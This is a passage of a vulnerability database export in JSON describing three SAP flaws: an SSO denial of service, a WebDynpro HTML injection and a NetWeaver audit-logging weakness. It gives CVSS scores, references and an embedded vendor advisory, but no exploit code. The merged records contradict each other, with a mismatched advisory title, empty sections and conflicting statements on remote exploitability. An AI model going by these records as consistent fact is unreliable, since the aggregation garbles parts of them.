}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:sap:sso_authentication_library:3.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:sso_authentication_library:2.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2017-7696"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Onapsis Research Labs",
"sources": [
{
"db": "BID",
"id": "95363"
},
{
"db": "CNNVD",
"id": "CNNVD-201704-559"
}
],
"trust": 0.9
},
"cve": "CVE-2017-7696",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"integrityImpact": "NONE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 5.0,
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2017-7696",
"impactScore": null,
"integrityImpact": "None",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 7.5,
"baseSeverity": "High",
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2017-7696",
"impactScore": null,
"integrityImpact": "None",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2017-7696",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201704-559",
"trust": 0.6,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-003212"
},
{
"db": "NVD",
"id": "CVE-2017-7696"
},
{
"db": "CNNVD",
"id": "CNNVD-201704-559"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP AS JAVA SSO Authentication Library 2.0 through 3.0 allow remote attackers to cause a denial of service (memory consumption) via large values in the width and height parameters to otp_logon_ui_resources/qr, aka SAP Security Note 2389042. SAP Single Sign On is prone to a denial-of-service vulnerability. \nAn attacker can exploit this issue to cause denial-of-service conditions",
"sources": [
{
"db": "NVD",
"id": "CVE-2017-7696"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-003212"
},
{
"db": "BID",
"id": "95363"
}
],
"trust": 1.89
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2017-7696",
"trust": 2.7
},
{
"db": "BID",
"id": "95363",
"trust": 0.9
},
{
"db": "JVNDB",
"id": "JVNDB-2017-003212",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201704-559",
"trust": 0.6
}
],
"sources": [
{
"db": "BID",
"id": "95363"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-003212"
},
{
"db": "NVD",
"id": "CVE-2017-7696"
},
{
"db": "CNNVD",
"id": "CNNVD-201704-559"
}
]
},
"id": "VAR-201704-1577",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.27111164
},
"last_update_date": "2023-12-18T13:34:21.238000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "https://www.sap.com/japan/index.html"
},
{
"title": "SAP AS JAVA SSO Authentication Library Security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=69192"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-003212"
},
{
"db": "CNNVD",
"id": "CNNVD-201704-559"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-770",
"trust": 1.0
},
{
"problemtype": "CWE-399",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-003212"
},
{
"db": "NVD",
"id": "CVE-2017-7696"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.7,
"url": "https://erpscan.com/advisories/erpscan-17-001-sap-java-dos-bc-iam-sso-otp-package-use-qr-servlet/"
},
{
"trust": 1.6,
"url": "https://erpscan.io/advisories/erpscan-17-001-sap-java-dos-bc-iam-sso-otp-package-use-qr-servlet/"
},
{
"trust": 0.9,
"url": "http://www.sap.com"
},
{
"trust": 0.9,
"url": "https://www.onapsis.com/blog/sap-security-notes-january-2017-continued-security-focus-sap-defense"
},
{
"trust": 0.9,
"url": "https://launchpad.support.sap.com/#/notes/2389042"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-7696"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-7696"
},
{
"trust": 0.6,
"url": "https://www.securityfocus.com/bid/95363"
}
],
"sources": [
{
"db": "BID",
"id": "95363"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-003212"
},
{
"db": "NVD",
"id": "CVE-2017-7696"
},
{
"db": "CNNVD",
"id": "CNNVD-201704-559"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "BID",
"id": "95363"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-003212"
},
{
"db": "NVD",
"id": "CVE-2017-7696"
},
{
"db": "CNNVD",
"id": "CNNVD-201704-559"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-01-10T00:00:00",
"db": "BID",
"id": "95363"
},
{
"date": "2017-05-19T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-003212"
},
{
"date": "2017-04-14T18:59:01.080000",
"db": "NVD",
"id": "CVE-2017-7696"
},
{
"date": "2017-04-12T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201704-559"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-04-12T21:00:00",
"db": "BID",
"id": "95363"
},
{
"date": "2017-05-19T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-003212"
},
{
"date": "2019-10-03T00:03:26.223000",
"db": "NVD",
"id": "CVE-2017-7696"
},
{
"date": "2019-10-23T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201704-559"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201704-559"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP AS JAVA SSO Authentication Library Service disruption in (DoS) Vulnerabilities",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-003212"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "resource management error",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201704-559"
}
],
"trust": 0.6
}
}
var-201002-0329
Vulnerability from variot
SAP WebDynpro Runtime included in SAP NetWeaver is prone to an HTML-injection vulnerability because the application fails to sanitize user-supplied input. Attacker-supplied HTML and script code would run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201002-0329",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver 2004s",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "0"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "20040"
},
{
"model": "netweaver 2004s sp13",
"scope": "ne",
"trust": 0.3,
"vendor": "sap",
"version": null
},
{
"model": "netweaver sp21",
"scope": "ne",
"trust": 0.3,
"vendor": "sap",
"version": "2004"
}
],
"sources": [
{
"db": "BID",
"id": "38181"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Mariano Di Croce",
"sources": [
{
"db": "BID",
"id": "38181"
}
],
"trust": 0.3
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP WebDynpro Runtime included in SAP NetWeaver is prone to an HTML-injection vulnerability because the application fails to sanitize user-supplied input.\nAttacker-supplied HTML and script code would run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.",
"sources": [
{
"db": "BID",
"id": "38181"
}
],
"trust": 0.3
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "BID",
"id": "38181",
"trust": 0.3
}
],
"sources": [
{
"db": "BID",
"id": "38181"
}
]
},
"id": "VAR-201002-0329",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.26917922
},
"last_update_date": "2022-05-17T02:10:06.608000Z",
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 0.3,
"url": "http://www.sap.com/platform/netweaver/index.epx"
},
{
"trust": 0.3,
"url": "/archive/1/509499"
}
],
"sources": [
{
"db": "BID",
"id": "38181"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "BID",
"id": "38181"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2010-02-11T00:00:00",
"db": "BID",
"id": "38181"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2010-02-11T00:00:00",
"db": "BID",
"id": "38181"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "network",
"sources": [
{
"db": "BID",
"id": "38181"
}
],
"trust": 0.3
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP WebDynpro Runtime Unspecified HTML Injection Vulnerability",
"sources": [
{
"db": "BID",
"id": "38181"
}
],
"trust": 0.3
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Input Validation Error",
"sources": [
{
"db": "BID",
"id": "38181"
}
],
"trust": 0.3
}
}
var-201610-0352
Vulnerability from variot
SAP Netweaver 7.40 improperly logs (1) DUI and (2) DUJ events in the SAP Security Audit Log as non-critical, which might allow local users to hide rejected attempts to execute RFC function callbacks by leveraging filtering of non-critical events in audit analysis reports, aka SAP Security Note 2252312. Vendors have confirmed this vulnerability SAP Security Note 2252312 It is released as. Supplementary information : CWE Vulnerability type by CWE-778: Insufficient Logging ( Insufficient logging ) Has been identified. SAP NetWeaver is prone to a security-bypass vulnerability. Remote attackers can exploit this issue to bypass certain security restrictions and gain unauthorized access to the application. SAP NetWeaver 7.40 is vulnerable; other versions may also be affected. Onapsis Security Advisory ONAPSIS-2016-051: SAP Business Objects Memory Corruption
1. Impact on Business
By exploiting this vulnerability an attacker could hide audit information logged by the SAP system.
Risk Level: Low
2. Advisory Information
- Public Release Date: 09/22/2016
- Last Revised: 09/22/2016
- Security Advisory ID: ONAPSIS-2016-051
- Onapsis SVS ID: ONAPSIS-00247
- CVE: CVE-2016-7437
- Researcher: Emiliano J. Fausto
- Vendor Provided CVSS v2: 1.7 (AV:L/AC:L/Au:S/C:N/I:P/A:N)
- Onapsis CVSS v2: 1.7 (AV:L/AC:L/Au:S/C:N/I:P/A:N)
3. Vulnerability Information
- Vendor: SAP AG
- Affected Components: SAP NETWEAVER 7.40
- Vulnerability Class: Insufficient Logging (CWE-778)
- Remotely Exploitable: No
- Locally Exploitable: Yes
- Authentication Required: Yes
- Original Advisory: https://www.onapsis.com/research/security-advisories/sap-business-objects-memory-corruption-0
4. Affected Components Description
The SAP Security Audit Log is used to record security-related system information such as changes to user master records or unsuccessful logon attempts. This log is a tool designed for auditors who need to take a detailed look at what occurs in the SAP System. By activating the audit log, you keep a record of those activities that you specify for your audit.
7. Report Timeline
- 11/24/2015: Onapsis provides vulnerability information to SAP AG.
- 09/22/2016: Onapsis Releases Security Advisory.
About Onapsis Research Labs
Onapsis Research Labs provides the industry analysis of key security issues that impact business-critical systems and applications. Delivering frequent and timely security and compliance advisories with associated risk levels, Onapsis Research Labs combine in-depth knowledge and experience to deliver technical and business-context with sound security judgment to the broader information security community.
About Onapsis, Inc.
Onapsis provides the most comprehensive solutions for securing SAP and Oracle enterprise applications. As the leading experts in SAP and Oracle cyber-security, Onapsis enables security and audit teams to have visibility, confidence and control of advanced threats, cyber-risks and compliance gaps affecting their enterprise applications.
Headquartered in Boston, Onapsis serves over 180 Global 2000 customers, including 10 top retailers, 20 top energy firms and 20 top manufacturers. Onapsis solutions are also the de-facto standard for leading consulting and audit firms such as Accenture, IBM, Deloitte, E&Y, KPMG and PwC.
Onapsis solutions include the Onapsis Security Platform, which is the most widely-used SAP-certified cyber-security solution in the market. Unlike generic security products, Onapsis context-aware solutions deliver both preventative vulnerability and compliance controls, as well as real-time detection and incident response capabilities to reduce risks affecting critical business processes and data. Through open interfaces, the platform can be integrated with leading SIEM, GRC and network security products, seamlessly incorporating enterprise applications into existing vulnerability, risk and incident response management programs.
These solutions are powered by the Onapsis Research Labs which continuously provide leading intelligence on security threats affecting SAP and Oracle enterprise applications. Experts of the Onapsis Research Labs were the first to lecture on SAP cyber-attacks and have uncovered and helped fix hundreds of security vulnerabilities to-date affecting SAP Business Suite, SAP HANA, SAP Cloud and SAP Mobile applications, as well as Oracle JD Edwards and Oracle E-Business Suite platforms.
For more information, please visit www.onapsis.com, or connect with us on Twitter, Google+, or LinkedIn.
-- This email and any files transmitted with it are confidential and intended solely for the use of the individual or entity to whom they are addressed. If you have received this email in error please notify the system manager. This message contains confidential information and is intended only for the individual named. If you are not the named addressee you should not disseminate, distribute or copy this e-mail. Please notify the sender immediately by e-mail if you have received this e-mail by mistake and delete this e-mail from your system. If you are not the intended recipient you are notified that disclosing, copying, distributing or taking any action in reliance on the contents of this information is strictly prohibited
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201610-0352",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver",
"scope": "eq",
"trust": 2.7,
"vendor": "sap",
"version": "7.40"
}
],
"sources": [
{
"db": "BID",
"id": "93503"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-005422"
},
{
"db": "NVD",
"id": "CVE-2016-7437"
},
{
"db": "CNNVD",
"id": "CNNVD-201610-416"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.40:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2016-7437"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Emiliano J. Fausto.",
"sources": [
{
"db": "BID",
"id": "93503"
}
],
"trust": 0.3
},
"cve": "CVE-2016-7437",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 2.1,
"confidentialityImpact": "NONE",
"exploitabilityScore": 3.9,
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "LOW",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:L/AC:L/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Local",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 2.1,
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2016-7437",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Low",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:L/AC:L/Au:N/C:N/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 3.3,
"baseSeverity": "LOW",
"confidentialityImpact": "NONE",
"exploitabilityScore": 1.8,
"impactScore": 1.4,
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Local",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 3.3,
"baseSeverity": "Low",
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2016-7437",
"impactScore": null,
"integrityImpact": "Low",
"privilegesRequired": "Low",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2016-7437",
"trust": 1.8,
"value": "LOW"
},
{
"author": "CNNVD",
"id": "CNNVD-201610-416",
"trust": 0.6,
"value": "LOW"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2016-005422"
},
{
"db": "NVD",
"id": "CVE-2016-7437"
},
{
"db": "CNNVD",
"id": "CNNVD-201610-416"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP Netweaver 7.40 improperly logs (1) DUI and (2) DUJ events in the SAP Security Audit Log as non-critical, which might allow local users to hide rejected attempts to execute RFC function callbacks by leveraging filtering of non-critical events in audit analysis reports, aka SAP Security Note 2252312. Vendors have confirmed this vulnerability SAP Security Note 2252312 It is released as. Supplementary information : CWE Vulnerability type by CWE-778: Insufficient Logging ( Insufficient logging ) Has been identified. SAP NetWeaver is prone to a security-bypass vulnerability. \nRemote attackers can exploit this issue to bypass certain security restrictions and gain unauthorized access to the application. \nSAP NetWeaver 7.40 is vulnerable; other versions may also be affected. Onapsis Security Advisory ONAPSIS-2016-051: SAP Business Objects Memory Corruption\n\n1. Impact on Business\n=====================\nBy exploiting this vulnerability an attacker could hide audit information logged by the SAP system. \n\nRisk Level: Low\n\n2. Advisory Information\n=======================\n- Public Release Date: 09/22/2016\n- Last Revised: 09/22/2016\n- Security Advisory ID: ONAPSIS-2016-051\n- Onapsis SVS ID: ONAPSIS-00247\n- CVE: CVE-2016-7437\n- Researcher: Emiliano J. Fausto\n- Vendor Provided CVSS v2: 1.7 (AV:L/AC:L/Au:S/C:N/I:P/A:N)\n- Onapsis CVSS v2: 1.7 (AV:L/AC:L/Au:S/C:N/I:P/A:N)\n\n3. Vulnerability Information\n============================\n- Vendor: SAP AG\n- Affected Components: SAP NETWEAVER 7.40\n- Vulnerability Class: Insufficient Logging (CWE-778)\n- Remotely Exploitable: No\n- Locally Exploitable: Yes\n- Authentication Required: Yes\n- Original Advisory: https://www.onapsis.com/research/security-advisories/sap-business-objects-memory-corruption-0\n\n4. Affected Components Description\n==================================\nThe SAP Security Audit Log is used to record security-related system information such as changes to user master records or unsuccessful logon attempts. This log is a tool designed for auditors who need to take a detailed look at what occurs in the SAP System. By activating the audit log, you keep a record of those activities that you specify for your audit. \n\n5. \n\n6. \n\n7. Report Timeline\n==================\n- 11/24/2015: Onapsis provides vulnerability information to SAP AG. \n- 09/22/2016: Onapsis Releases Security Advisory. \n\n\nAbout Onapsis Research Labs\n===========================\nOnapsis Research Labs provides the industry analysis of key security issues that impact business-critical systems and applications. Delivering frequent and timely security and compliance advisories with associated risk levels, Onapsis Research Labs combine in-depth knowledge and experience to deliver technical and business-context with sound security judgment to the broader information security community. \n\nAbout Onapsis, Inc. \n===================\nOnapsis provides the most comprehensive solutions for securing SAP and Oracle enterprise applications. As the leading experts in SAP and Oracle cyber-security, Onapsis enables security and audit teams to have visibility, confidence and control of advanced threats, cyber-risks and compliance gaps affecting their enterprise applications. \n\nHeadquartered in Boston, Onapsis serves over 180 Global 2000 customers, including 10 top retailers, 20 top energy firms and 20 top 